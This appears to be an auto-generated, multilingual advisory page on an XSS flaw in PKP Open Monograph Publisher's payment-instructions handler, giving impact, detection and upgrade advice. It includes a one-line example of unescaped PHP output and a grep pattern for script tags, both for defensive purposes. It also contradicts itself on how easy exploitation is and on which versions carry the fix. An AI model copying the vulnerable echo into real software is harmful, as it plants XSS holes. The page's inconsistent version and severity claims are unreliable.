平台
php
组件
pkp-lib
修复版本
3.3.1
3.4.1
3.5.1
3.3.1
3.4.1
3.5.1
A cross-site scripting (XSS) vulnerability has been identified in Public Knowledge Project Open Monograph Publisher (OMP) versions 3.3.0 through 3.5.0. This vulnerability affects the Payment Instructions Setting Handler component and allows an attacker to inject malicious scripts via manipulation of the manualInstructions argument. Successful exploitation could lead to session hijacking or defacement of the OMP website. The vulnerability is fixed in version 3.5.1.
The XSS vulnerability in OMP allows an attacker to inject arbitrary JavaScript code into the web page viewed by other users. This can be exploited to steal user credentials, redirect users to malicious websites, or deface the website. The impact is particularly severe if the OMP instance is used to manage sensitive data or handle financial transactions. An attacker could potentially gain unauthorized access to user accounts and perform actions on their behalf. While the CVSS score is LOW, the potential for user data compromise and website manipulation warrants immediate attention.
This vulnerability was publicly disclosed on 2025-11-20. No public proof-of-concept (POC) code has been released at the time of writing, but the ease of exploitation suggests that it could become a target for automated attacks. The vulnerability is not currently listed on CISA KEV. The LOW CVSS score reflects the limited impact and difficulty of exploitation, but proactive mitigation is still recommended.
Organizations and individuals using Public Knowledge Project OMP for publishing monographs and other scholarly works are at risk. This includes academic institutions, research organizations, and publishers who rely on OMP for their content management needs. Shared hosting environments where multiple OMP instances are hosted on the same server are particularly vulnerable, as a compromise of one instance could potentially affect others.
• php: Examine the plugins/paymethod/manual/templates/paymentForm.tpl file for unsanitized input handling of the manualInstructions variable. Search for instances where this variable is directly output to the page without proper encoding.
// Example of vulnerable code
echo $_GET['manualInstructions'];• generic web: Monitor access logs for unusual requests targeting the plugins/paymethod/manual/templates/paymentForm.tpl endpoint with potentially malicious parameters in the manualInstructions query string. Use a WAF to block requests containing suspicious JavaScript code.
grep "<script" /var/log/apache2/access.logdisclosure
漏洞利用状态
EPSS
0.06% (19% 百分位)
CISA SSVC
CVSS 向量
The primary mitigation for CVE-2025-13469 is to upgrade to OMP version 3.5.1 or later, which contains the fix. If upgrading is not immediately feasible, consider implementing input validation and sanitization on the manualInstructions parameter to prevent malicious code from being injected. Web Application Firewalls (WAFs) configured to detect and block XSS attacks can also provide an additional layer of protection. Review and update any custom plugins or themes to ensure they do not introduce similar vulnerabilities.
Actualice Public Knowledge Project omp/ojs a una versión posterior a 3.5.0. Esto solucionará la vulnerabilidad de cross-site scripting en el componente Payment Instructions Setting Handler. Consulte las notas de la versión para obtener más detalles sobre la actualización.
漏洞分析和关键警报直接发送到您的邮箱。
CVE-2025-13469 is a cross-site scripting (XSS) vulnerability affecting Public Knowledge Project OMP versions 3.3.0 through 3.5.0, allowing attackers to inject malicious scripts.
You are affected if you are running Public Knowledge Project OMP versions 3.3.0, 3.4.0, or 3.5.0. Upgrade to 3.5.1 or later to resolve the issue.
Upgrade to Public Knowledge Project OMP version 3.5.1 or later. Consider input validation and WAF rules as interim measures.
While no active exploitation has been confirmed, the ease of exploitation suggests it could become a target. Proactive mitigation is recommended.
Refer to the Public Knowledge Project security advisories page for the latest information: [https://security.pkp.org/](https://security.pkp.org/)